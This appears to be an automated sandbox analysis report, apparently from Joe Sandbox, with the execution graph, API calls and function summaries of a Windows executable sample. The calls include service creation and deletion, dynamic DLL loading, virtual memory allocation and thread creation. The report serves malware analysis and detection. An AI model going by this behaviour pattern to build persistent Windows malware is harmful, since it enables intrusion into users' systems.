                                                                                                                execution_graph 13953 140005df3 13954 140005e71 13953->13954 13955 140005e84 CreateFileA 13954->13955 13956 140005f50 _CreateFrameInfo 13955->13956 13957 140005fc3 malloc ReadFile 13956->13957 15409 140007412 15412 140007333 15409->15412 15410 140007403 15411 1400073e0 LdrLoadDll 15411->15412 15412->15410 15412->15411 15416 7ffbc32011b0 15423 7ffbc3201209 15416->15423 15417 7ffbc3201b90 51 API calls 15434 7ffbc3201300 BuildCatchObjectHelperInternal 15417->15434 15418 7ffbc32014f0 15449 7ffbc3201a40 15418->15449 15419 7ffbc3201b70 _log10_special 8 API calls 15422 7ffbc32014d3 15419->15422 15420 7ffbc32012c7 15426 7ffbc3201b90 51 API calls 15420->15426 15421 7ffbc320129e 15425 7ffbc32014f6 15421->15425 15435 7ffbc3201b90 15421->15435 15423->15418 15423->15420 15423->15421 15429 7ffbc32012b9 BuildCatchObjectHelperInternal 15423->15429 15423->15434 15452 7ffbc3201110 15425->15452 15426->15429 15429->15417 15432 7ffbc32014eb 15444 7ffbc32079cc 15432->15444 15434->15419 15438 7ffbc3201b9b 15435->15438 15436 7ffbc32012b0 15436->15429 15436->15432 15437 7ffbc3207a4c BuildCatchObjectHelperInternal 2 API calls 15437->15438 15438->15436 15438->15437 15439 7ffbc3201bba 15438->15439 15440 7ffbc3201bc5 15439->15440 15458 7ffbc32021f0 15439->15458 15442 7ffbc3201110 Concurrency::cancel_current_task 51 API calls 15440->15442 15443 7ffbc3201bcb 15442->15443 15445 7ffbc3207844 _invalid_parameter_noinfo_noreturn 47 API calls 15444->15445 15446 7ffbc32079e5 15445->15446 15447 7ffbc32079fc _invalid_parameter_noinfo_noreturn 17 API calls 15446->15447 15448 7ffbc32079fa 15447->15448 15462 7ffbc3201b34 15449->15462 15453 7ffbc320111e Concurrency::cancel_current_task 15452->15453 15454 7ffbc3203990 Concurrency::cancel_current_task 2 API calls 15453->15454 15455 7ffbc320112f 15454->15455 15456 7ffbc320379c __std_exception_copy 49 API calls 15455->15456 15457 7ffbc3201159 15456->15457 15459 7ffbc32021fe Concurrency::cancel_current_task 15458->15459 15460 7ffbc3203990 Concurrency::cancel_current_task 2 API calls 15459->15460 15461 7ffbc320220f 15460->15461 15467 7ffbc3201ab0 15462->15467 15465 7ffbc3203990 Concurrency::cancel_current_task 2 API calls 15466 7ffbc3201b56 15465->15466 15470 7ffbc320379c 15467->15470 15471 7ffbc3201ae4 15470->15471 15472 7ffbc32037bd 15470->15472 15471->15465 15472->15471 15473 7ffbc32037f2 15472->15473 15476 7ffbc32089bc 15472->15476 15485 7ffbc3207b58 15473->15485 15477 7ffbc32089d3 15476->15477 15478 7ffbc32089c9 15476->15478 15479 7ffbc3208bc0 BuildCatchObjectHelperInternal 11 API calls 15477->15479 15478->15477 15483 7ffbc32089ee 15478->15483 15480 7ffbc32089da 15479->15480 15482 7ffbc32079ac _invalid_parameter_noinfo 47 API calls 15480->15482 15481 7ffbc32089e6 15481->15473 15482->15481 15483->15481 15484 7ffbc3208bc0 BuildCatchObjectHelperInternal 11 API calls 15483->15484 15484->15480 15486 7ffbc3208be0 15485->15486 15487 7ffbc3208be5 HeapFree 15486->15487 15489 7ffbc3208c16 15486->15489 15488 7ffbc3208c00 GetLastError 15487->15488 15487->15489 15490 7ffbc3208c0d __free_lconv_num 15488->15490 15489->15471 15491 7ffbc3208bc0 BuildCatchObjectHelperInternal 11 API calls 15490->15491 15491->15489 15825 140013670 InitializeCriticalSection CreateEventW CreateEventW CreateEventW 15828 1400054e0 15825->15828 15827 1400136ef 15829 140005506 _lock 15828->15829 15830 14000552c 15828->15830 15829->15827 15831 1400074d0 LdrLoadDll 15830->15831 15832 140005536 15831->15832 15833 140008370 3 API calls 15832->15833 15837 140005545 _CreateFrameInfo 15833->15837 15834 1400055b8 15835 140008de0 _lock 2 API calls 15834->15835 15836 1400055c0 sprintf_s 15835->15836 15836->15829 15837->15834 15838 1400074f0 LdrLoadDll 15837->15838 15839 140005561 CreateThread 15838->15839 15839->15836 15840 1400055b0 GetLastError 15839->15840 15840->15834 13962 140005a70 GetStartupInfoW GetProcessHeap HeapAlloc 13963 140005ab1 13962->13963 13964 140005add GetVersionExA 13962->13964 13967 140005abf 13963->13967 14012 140009540 13963->14012 13965 140005b0e GetProcessHeap HeapFree 13964->13965 13966 140005af0 GetProcessHeap HeapFree 13964->13966 13972 140005b3c 13965->13972 13968 140005d0b 13966->13968 14020 140009300 13967->14020 13971 140005ac9 14031 140008510 GetModuleHandleA 13971->14031 14035 14000a310 HeapCreate 13972->14035 13975 140005bec 13976 140005c12 13975->13976 13977 140005bf0 13975->13977 13981 140005c17 13976->13981 13978 140005bfe 13977->13978 13979 140009540 _lock 12 API calls 13977->13979 13980 140009300 _lock 10 API calls 13978->13980 13979->13978 13982 140005c08 13980->13982 13983 140005c3d 13981->13983 13985 140005c29 13981->13985 13986 140009540 _lock 12 API calls 13981->13986 13984 140008510 _lock 3 API calls 13982->13984 14038 140009f50 GetStartupInfoA 13983->14038 13984->13976 13987 140009300 _lock 10 API calls 13985->13987 13986->13985 13988 140005c33 13987->13988 13990 140008510 _lock 3 API calls 13988->13990 13990->13983 13992 140005c56 14058 140009e30 13992->14058 13995 140005c5b 14076 140009c30 13995->14076 13999 140005c73 14000 140005c81 13999->14000 14001 1400084e0 _lock 12 API calls 13999->14001 14106 140009690 14000->14106 14001->14000 14003 140005c86 14004 140005c94 14003->14004 14005 1400084e0 _lock 12 API calls 14003->14005 14118 140008650 14004->14118 14005->14004 14007 140005c9e 14008 1400084e0 _lock 12 API calls 14007->14008 14009 140005ca9 14007->14009 14008->14009 14122 140001520 14009->14122 14011 140005ad3 14011->13968 14013 14000954e _lock 14012->14013 14014 14000961c 14013->14014 14015 14000959c 14013->14015 14017 1400095c9 GetStdHandle 14013->14017 14014->13967 14016 140009300 _lock 10 API calls 14015->14016 14016->14014 14017->14015 14018 1400095dc 14017->14018 14018->14015 14019 1400095e2 WriteFile 14018->14019 14019->14015 14024 140009320 _lock 14020->14024 14021 140009330 14021->13971 14022 1400094dc GetStdHandle 14022->14021 14023 1400094ef 14022->14023 14023->14021 14025 1400094f5 WriteFile 14023->14025 14024->14021 14024->14022 14026 140009375 _lock 14024->14026 14025->14021 14026->14021 14027 1400093b9 GetModuleFileNameA 14026->14027 14028 1400093d9 _lock 14027->14028 14140 14000f000 14028->14140 14032 140008543 ExitProcess 14031->14032 14033 14000852a GetProcAddress 14031->14033 14033->14032 14034 14000853f 14033->14034 14034->14032 14036 14000a334 14035->14036 14037 14000a339 HeapSetInformation 14035->14037 14036->13975 14037->13975 14166 140008370 14038->14166 14040 140005c48 14040->13992 14051 1400084e0 14040->14051 14041 14000a1c4 GetStdHandle 14045 14000a17c 14041->14045 14042 140008370 3 API calls 14046 140009f8a 14042->14046 14043 14000a239 SetHandleCount 14043->14040 14044 14000a1d8 GetFileType 14044->14045 14045->14040 14045->14041 14045->14043 14045->14044 14050 14000edc0 _lock 3 API calls 14045->14050 14046->14040 14046->14042 14046->14045 14046->14046 14047 14000a0e3 14046->14047 14047->14040 14047->14045 14048 14000a11c GetFileType 14047->14048 14171 14000edc0 14047->14171 14048->14047 14050->14045 14052 140009540 _lock 12 API calls 14051->14052 14053 1400084ed 14052->14053 14054 140009300 _lock 10 API calls 14053->14054 14055 1400084f4 14054->14055 14056 1400073e0 _lock LdrLoadDll 14055->14056 14057 140008500 14056->14057 14059 140009e7c 14058->14059 14060 140009e3e GetCommandLineW 14058->14060 14061 140009e81 GetCommandLineW 14059->14061 14062 140009e69 14059->14062 14063 140009e49 GetCommandLineW 14060->14063 14064 140009e5e GetLastError 14060->14064 14061->14062 14065 140009e75 14062->14065 14066 140009e91 GetCommandLineA MultiByteToWideChar 14062->14066 14063->14064 14064->14062 14064->14065 14065->13995 14067 140009ec8 14066->14067 14068 140009ed9 14066->14068 14067->13995 14069 140008370 3 API calls 14068->14069 14070 140009eeb 14069->14070 14071 140009f32 14070->14071 14072 140009ef3 MultiByteToWideChar 14070->14072 14071->13995 14073 140009f13 14072->14073 14074 140009f2a 14072->14074 14073->13995 14185 140008de0 14074->14185 14077 140009c52 GetEnvironmentStringsW 14076->14077 14078 140009c86 14076->14078 14079 140009c6c GetLastError 14077->14079 14085 140009c60 14077->14085 14080 140009c91 GetEnvironmentStringsW 14078->14080 14081 140009c77 14078->14081 14079->14078 14079->14081 14080->14085 14096 140005c67 14080->14096 14082 140009d09 GetEnvironmentStrings 14081->14082 14081->14096 14083 140009d17 14082->14083 14082->14096 14084 140009d58 14083->14084 14087 140009d20 MultiByteToWideChar 14083->14087 14088 140008370 3 API calls 14084->14088 14190 140008300 14085->14190 14087->14083 14087->14096 14090 140009d68 14088->14090 14093 140009d70 FreeEnvironmentStringsA 14090->14093 14098 140009d7d 14090->14098 14091 140009ce1 __CxxFrameHandler 14094 140009cef FreeEnvironmentStringsW 14091->14094 14092 140009cd1 FreeEnvironmentStringsW 14092->14096 14093->14096 14094->14096 14095 140009de5 FreeEnvironmentStringsA 14095->14096 14102 1400099c0 GetModuleFileNameW 14096->14102 14097 140009d90 MultiByteToWideChar 14097->14098 14099 140009e0e 14097->14099 14098->14095 14098->14097 14100 140008de0 _lock 2 API calls 14099->14100 14101 140009e16 FreeEnvironmentStringsA 14100->14101 14101->14096 14104 140009a03 14102->14104 14103 140008300 _lock 17 API calls 14105 140009bca 14103->14105 14104->14103 14104->14105 14105->13999 14107 1400096a8 14106->14107 14108 1400096b2 14106->14108 14107->14003 14109 140008370 3 API calls 14108->14109 14117 1400096fa 14109->14117 14110 140009709 14110->14003 14111 1400097a5 14112 140008de0 _lock 2 API calls 14111->14112 14113 1400097b4 14112->14113 14113->14003 14114 140008370 3 API calls 14114->14117 14115 1400097e5 14116 140008de0 _lock 2 API calls 14115->14116 14116->14113 14117->14110 14117->14111 14117->14114 14117->14115 14119 140008666 14118->14119 14121 1400086bf 14119->14121 14206 140005380 14119->14206 14121->14007 14123 140001565 14122->14123 14124 140001569 14123->14124 14125 14000157e 14123->14125 14244 140001430 GetModuleFileNameW OpenSCManagerW 14124->14244 14128 140001595 OpenSCManagerW 14125->14128 14129 14000164f 14125->14129 14130 1400015b2 GetLastError 14128->14130 14131 1400015cf OpenServiceW 14128->14131 14132 140001654 14129->14132 14133 140001669 StartServiceCtrlDispatcherW 14129->14133 14130->14011 14134 140001611 DeleteService 14131->14134 14135 1400015e9 GetLastError CloseServiceHandle 14131->14135 14253 1400011f0 14132->14253 14133->14011 14137 140001626 CloseServiceHandle CloseServiceHandle 14134->14137 14138 14000161e GetLastError 14134->14138 14135->14011 14137->14011 14138->14137 14141 14000f01e _lock 14140->14141 14142 14000f03b LoadLibraryA 14141->14142 14145 14000f125 _lock 14141->14145 14143 14000f054 GetProcAddress 14142->14143 14144 1400094c9 14142->14144 14143->14144 14147 14000f06d _lock 14143->14147 14144->13971 14146 14000f165 14145->14146 14163 1400073e0 LdrLoadDll 14145->14163 14149 1400073e0 _lock LdrLoadDll 14146->14149 14159 14000f1a3 _lock 14146->14159 14152 14000f075 GetProcAddress 14147->14152 14148 1400073e0 _lock LdrLoadDll 14148->14144 14157 14000f1e9 14149->14157 14154 140007220 _lock 14152->14154 14153 1400073e0 _lock LdrLoadDll 14153->14146 14155 14000f094 GetProcAddress 14154->14155 14156 14000f0b3 _lock 14155->14156 14156->14145 14160 14000f0e9 GetProcAddress 14156->14160 14158 1400073e0 _lock LdrLoadDll 14157->14158 14157->14159 14158->14159 14159->14148 14161 14000f101 _lock 14160->14161 14161->14145 14162 14000f10d GetProcAddress 14161->14162 14162->14145 14165 140007333 14163->14165 14164 140007403 14164->14153 14165->14163 14165->14164 14167 1400083a0 14166->14167 14169 1400083e0 14167->14169 14170 1400083be Sleep 14167->14170 14177 14000e850 14167->14177 14169->14046 14170->14167 14170->14169 14172 1400073e0 _lock LdrLoadDll 14171->14172 14173 14000edec _lock 14172->14173 14174 14000ee1d _lock 14173->14174 14175 14000ee26 GetModuleHandleA 14173->14175 14174->14047 14175->14174 14176 14000ee38 GetProcAddress 14175->14176 14176->14174 14178 14000e865 14177->14178 14179 14000e8be HeapAlloc 14178->14179 14181 14000e876 _lock 14178->14181 14182 1400090b0 14178->14182 14179->14178 14179->14181 14181->14167 14183 1400073e0 _lock LdrLoadDll 14182->14183 14184 1400090c5 14183->14184 14184->14178 14186 140008de9 HeapFree 14185->14186 14187 140008e19 _lock 14185->14187 14186->14187 14188 140008dff _lock 14186->14188 14187->14071 14189 140008e09 GetLastError 14188->14189 14189->14187 14191 140008320 14190->14191 14193 140008358 14191->14193 14194 140008338 Sleep 14191->14194 14195 1400090f0 14191->14195 14193->14091 14193->14092 14194->14191 14194->14193 14196 14000919e 14195->14196 14203 140009103 14195->14203 14197 1400090b0 _lock LdrLoadDll 14196->14197 14199 1400091a3 _lock 14197->14199 14198 14000914c HeapAlloc 14198->14203 14204 140009173 _lock 14198->14204 14199->14191 14200 140009540 _lock 12 API calls 14200->14203 14201 140009300 _lock 10 API calls 14201->14203 14202 1400090b0 _lock LdrLoadDll 14202->14203 14203->14198 14203->14200 14203->14201 14203->14202 14203->14204 14205 140008510 _lock 3 API calls 14203->14205 14204->14191 14205->14203 14209 140005250 14206->14209 14208 140005389 14208->14121 14210 140005271 14209->14210 14211 1400073e0 _lock LdrLoadDll 14210->14211 14212 14000527e 14211->14212 14213 1400073e0 _lock LdrLoadDll 14212->14213 14214 14000528d 14213->14214 14220 1400052f0 _lock 14214->14220 14221 140008490 14214->14221 14216 1400052b5 14217 1400052d9 14216->14217 14216->14220 14224 140008400 14216->14224 14219 140008400 7 API calls 14217->14219 14217->14220 14219->14220 14220->14208 14222 1400084c5 HeapSize 14221->14222 14223 140008499 _lock 14221->14223 14223->14216 14226 140008430 14224->14226 14227 140008472 14226->14227 14228 140008450 Sleep 14226->14228 14229 14000e920 14226->14229 14227->14217 14228->14226 14228->14227 14230 14000e935 14229->14230 14231 14000e94c 14230->14231 14240 14000e95e 14230->14240 14232 140008de0 _lock 2 API calls 14231->14232 14234 14000e951 14232->14234 14233 14000e9b1 14236 1400090b0 _lock LdrLoadDll 14233->14236 14234->14226 14235 14000e973 HeapReAlloc 14235->14240 14243 14000e9b9 _lock 14235->14243 14236->14243 14237 14000e9f4 _lock 14239 14000e9f9 GetLastError 14237->14239 14238 1400090b0 _lock LdrLoadDll 14238->14240 14239->14243 14240->14233 14240->14235 14240->14237 14240->14238 14241 14000e9db _lock 14240->14241 14242 14000e9e0 GetLastError 14241->14242 14242->14243 14243->14226 14245 140001482 CreateServiceW 14244->14245 14246 14000147a GetLastError 14244->14246 14248 1400014ea GetLastError 14245->14248 14249 1400014df CloseServiceHandle 14245->14249 14247 1400014fd 14246->14247 14259 140004f30 14247->14259 14250 1400014f2 CloseServiceHandle 14248->14250 14249->14250 14250->14247 14252 14000150d 14252->14011 14254 1400011fa 14253->14254 14268 1400051d0 14254->14268 14257 140004f30 sprintf_s NtAllocateVirtualMemory 14258 140001262 14257->14258 14258->14011 14261 140004f39 _CreateFrameInfo 14259->14261 14260 140004f44 14260->14252 14261->14260 14264 140006c95 14261->14264 14263 14000660e sprintf_s 14263->14252 14266 140006d7b 14264->14266 14267 140006d9d 14264->14267 14265 140006f95 NtAllocateVirtualMemory 14265->14267 14266->14265 14266->14267 14267->14263 14271 140008270 14268->14271 14270 140001238 MessageBoxW 14270->14257 14272 1400082ac _lock 14271->14272 14273 14000827e 14271->14273 14272->14270 14273->14272 14275 140008120 14273->14275 14276 14000813b _lock 14275->14276 14277 14000816a 14275->14277 14276->14272 14277->14276 14279 1400081d7 14277->14279 14281 140007f50 14277->14281 14279->14276 14280 140007f50 sprintf_s 54 API calls 14279->14280 14280->14276 14290 140007f69 sprintf_s 14281->14290 14282 140007f74 _lock 14282->14279 14283 14000801d 14284 1400080d5 14283->14284 14285 14000802f 14283->14285 14287 14000cc00 sprintf_s 54 API calls 14284->14287 14286 14000804c 14285->14286 14289 140008081 14285->14289 14297 14000cc00 14286->14297 14291 140008056 14287->14291 14289->14291 14305 14000c2a0 14289->14305 14290->14282 14290->14283 14294 14000cd50 14290->14294 14291->14279 14295 140008300 _lock 17 API calls 14294->14295 14296 14000cd6a 14295->14296 14296->14283 14298 14000cc3f 14297->14298 14299 14000cc23 _lock sprintf_s 14297->14299 14298->14299 14313 14000fc50 14298->14313 14299->14291 14303 14000ccc5 _lock sprintf_s 14358 14000fd20 LeaveCriticalSection 14303->14358 14306 14000c2e0 14305->14306 14309 14000c2c3 _lock sprintf_s 14305->14309 14307 14000fc50 sprintf_s 25 API calls 14306->14307 14306->14309 14308 14000c34e 14307->14308 14310 14000c1f0 sprintf_s 2 API calls 14308->14310 14311 14000c367 _lock sprintf_s 14308->14311 14309->14291 14310->14311 14392 14000fd20 LeaveCriticalSection 14311->14392 14314 14000fc96 14313->14314 14315 14000fccb 14313->14315 14359 14000b400 14314->14359 14316 14000ccac 14315->14316 14317 14000fccf EnterCriticalSection 14315->14317 14316->14303 14323 14000c3f0 14316->14323 14317->14316 14326 14000c42e 14323->14326 14342 14000c427 _lock sprintf_s 14323->14342 14324 140004f30 sprintf_s NtAllocateVirtualMemory 14325 14000cbe6 14324->14325 14325->14303 14329 14000c4fb sprintf_s _CreateFrameInfo 14326->14329 14326->14342 14386 14000c1f0 14326->14386 14328 14000c841 14330 14000c86a 14328->14330 14331 14000cb20 WriteFile 14328->14331 14329->14328 14333 14000c526 GetConsoleMode 14329->14333 14332 14000c936 14330->14332 14338 14000c876 14330->14338 14334 14000cb53 GetLastError 14331->14334 14331->14342 14339 14000c940 14332->14339 14348 14000ca02 14332->14348 14333->14328 14335 14000c557 14333->14335 14334->14342 14335->14328 14336 14000c564 GetConsoleCP 14335->14336 14336->14342 14352 14000c581 sprintf_s 14336->14352 14337 14000c8c5 WriteFile 14337->14338 14340 14000c928 GetLastError 14337->14340 14338->14337 14338->14342 14339->14342 14343 14000c991 WriteFile 14339->14343 14340->14342 14341 14000ca57 WideCharToMultiByte 14344 14000cb15 GetLastError 14341->14344 14341->14348 14342->14324 14343->14339 14345 14000c9f4 GetLastError 14343->14345 14344->14342 14345->14342 14346 14000cab0 WriteFile 14347 14000caf6 GetLastError 14346->14347 14346->14348 14347->14342 14347->14348 14348->14341 14348->14342 14348->14346 14349 14000c649 WideCharToMultiByte 14349->14342 14350 14000c68c WriteFile 14349->14350 14350->14352 14353 14000c80d GetLastError 14350->14353 14351 14000c829 GetLastError 14351->14342 14352->14342 14352->14349 14352->14351 14354 14000fd50 7 API calls sprintf_s 14352->14354 14355 14000c6e2 WriteFile 14352->14355 14357 14000c81b GetLastError 14352->14357 14353->14342 14354->14352 14355->14352 14356 14000c7ff GetLastError 14355->14356 14356->14342 14357->14342 14360 14000b41e 14359->14360 14361 14000b42f EnterCriticalSection 14359->14361 14365 14000b2f0 14360->14365 14363 14000b423 14363->14361 14364 1400084e0 _lock 12 API calls 14363->14364 14364->14361 14366 14000b317 14365->14366 14367 14000b32e 14365->14367 14368 140009540 _lock 12 API calls 14366->14368 14370 140008300 _lock 17 API calls 14367->14370 14377 14000b342 _lock 14367->14377 14369 14000b31c 14368->14369 14371 140009300 _lock 10 API calls 14369->14371 14372 14000b350 14370->14372 14373 14000b324 14371->14373 14375 14000b400 _lock 22 API calls 14372->14375 14372->14377 14374 140008510 _lock GetModuleHandleA GetProcAddress ExitProcess 14373->14374 14374->14367 14376 14000b371 14375->14376 14378 14000b3a7 14376->14378 14379 14000b379 14376->14379 14377->14363 14381 140008de0 _lock HeapFree GetLastError 14378->14381 14380 14000edc0 _lock LdrLoadDll GetModuleHandleA GetProcAddress 14379->14380 14382 14000b386 14380->14382 14385 14000b392 _lock 14381->14385 14384 140008de0 _lock HeapFree GetLastError 14382->14384 14382->14385 14383 14000b3b0 LeaveCriticalSection 14383->14377 14384->14385 14385->14383 14387 14000c20c sprintf_s 14386->14387 14388 14000c212 _lock 14387->14388 14389 14000c22c SetFilePointer 14387->14389 14388->14329 14390 14000c254 sprintf_s 14389->14390 14391 14000c24a GetLastError 14389->14391 14390->14329 14391->14390 13958 140006c95 13960 140006d7b 13958->13960 13961 140006d9d 13958->13961 13959 140006f95 NtAllocateVirtualMemory 13959->13961 13960->13959 13960->13961 14393 1400054e0 14394 140005506 _lock 14393->14394 14395 14000552c 14393->14395 14406 1400074d0 14395->14406 14398 140008370 3 API calls 14402 140005545 _CreateFrameInfo 14398->14402 14399 1400055b8 14400 140008de0 _lock 2 API calls 14399->14400 14401 1400055c0 sprintf_s 14400->14401 14401->14394 14402->14399 14410 1400074f0 14402->14410 14405 1400055b0 GetLastError 14405->14399 14408 140007333 14406->14408 14407 140005536 14407->14398 14408->14407 14409 1400073e0 LdrLoadDll 14408->14409 14409->14408 14412 140007333 14410->14412 14411 140005561 CreateThread 14411->14401 14411->14405 14412->14411 14413 1400073e0 LdrLoadDll 14412->14413 14413->14412

                                                                                                                Executed Functions

                                                                                                                Function 0000000140006C95 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 260COMMONLIBRARYCODE
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 131 140006c95-140006d75 132 1400075a3-1400075af 131->132 133 140006d7b-140006d9b 131->133 134 140006da2-140006dbc 133->134 135 140006d9d 133->135 136 140006dc3-140006ded 134->136 137 140006dbe 134->137 135->132 138 140006df4-140006e04 136->138 139 140006def 136->139 137->132 140 140006e06 138->140 141 140006e0b-140006e19 138->141 139->132 140->132 142 140006e1b 141->142 143 140006e20-140006e2f 141->143 142->132 144 140006e31 143->144 145 140006e36-140006e4e 143->145 144->132 146 140006e5a-140006e67 145->146 147 140006e69-140006e94 146->147 148 140006e9d-140006ed0 146->148 149 140006e96 147->149 150 140006e9b 147->150 151 140006edc-140006ee9 148->151 149->132 150->146 153 140006f89-140006f8e 151->153 154 140006eef-140006f23 151->154 155 140006f95-140006fd6 NtAllocateVirtualMemory 153->155 156 140006f90 153->156 157 140006f25-140006f2d 154->157 158 140006f2f-140006f33 154->158 155->132 160 140006fdc-140007020 155->160 156->132 159 140006f37-140006f7a 157->159 158->159 161 140006f84 159->161 162 140006f7c-140006f80 159->162 163 14000702c-140007037 160->163 161->151 162->161 165 140007039-140007058 163->165 166 14000705a-140007062 163->166 165->163 168 14000706e-14000707b 166->168 169 140007081-140007094 168->169 170 140007148-14000715e 168->170 173 140007096-1400070a9 169->173 174 1400070ab 169->174 171 1400072e2-1400072eb 170->171 172 140007164-14000717a 170->172 172->171 173->174 176 1400070ad-1400070db 173->176 175 140007064-14000706a 174->175 175->168 177 1400070ea-140007101 176->177 178 140007143 177->178 179 140007103-140007141 177->179 178->175 179->177
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @$@
                                                                                                                • API String ID: 0-149943524
                                                                                                                • Opcode ID: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                                                                                                • Instruction ID: b9b90cad4d4dbad5e60228b5b2812afcd9ff4e9267d7912497f5da913a33a31e
                                                                                                                • Opcode Fuzzy Hash: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                                                                                                • Instruction Fuzzy Hash: 0EE19876619B84CADBA1CB19E4807AAB7A1F3C8795F105116FB8E87B68DB7CC454CF00
                                                                                                                Function 00000001400073E0 Relevance: 1.6, APIs: 1, Instructions: 121libraryloaderCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 256 1400073e0-1400073e9 LdrLoadDll 257 1400073f8-140007401 256->257 258 140007403 257->258 259 140007408-14000742e 257->259 260 1400075a3-1400075af 258->260 262 140007435-140007462 259->262 263 140007430 259->263 265 140007464-14000747e 262->265 266 1400074b6-1400074e9 262->266 264 140007559-140007567 263->264 274 140007341-1400073de 264->274 275 14000756c-1400075a2 264->275 270 1400074b4 265->270 271 140007480-1400074b3 265->271 267 1400074eb-14000752b 266->267 268 14000752c-140007535 266->268 267->268 272 140007552 268->272 273 140007537-140007554 268->273 270->268 271->270 272->260 273->264 274->256 275->260
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Load
                                                                                                                • String ID:
                                                                                                                • API String ID: 2234796835-0
                                                                                                                • Opcode ID: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                                                                                                • Instruction ID: 9a2124daaedac402c784edcfb7064d0c1467828d98a6eaf5875e1b487be58861
                                                                                                                • Opcode Fuzzy Hash: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                                                                                                • Instruction Fuzzy Hash: 2451A676619BC582DA71CB1AE4907EEA360F7C8B85F504026EB8E87B69DF3DC455CB00
                                                                                                                Function 0000000140005DF3 Relevance: 54.3, APIs: 3, Strings: 28, Instructions: 79fileCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$CreateReadmalloc
                                                                                                                • String ID: .$.$L$M$M$a$a$c$c$d$d$i$l$l$l$l$m$m$o$p$r$s$s$s$t$t$t$v
                                                                                                                • API String ID: 3950102678-3381721293
                                                                                                                • Opcode ID: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                                                                                                • Instruction ID: 29f707ba186f29322d2427d6251999ac740dd2877dad0e4ee3b4d54c0b8fffc7
                                                                                                                • Opcode Fuzzy Hash: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                                                                                                • Instruction Fuzzy Hash: 0241A03250C7C0C9E372C729E45879BBB91E3A6748F04405997C846B9ACBBED158CB22
                                                                                                                Function 00007FFBC3201C00 Relevance: 12.2, APIs: 8, Instructions: 227COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
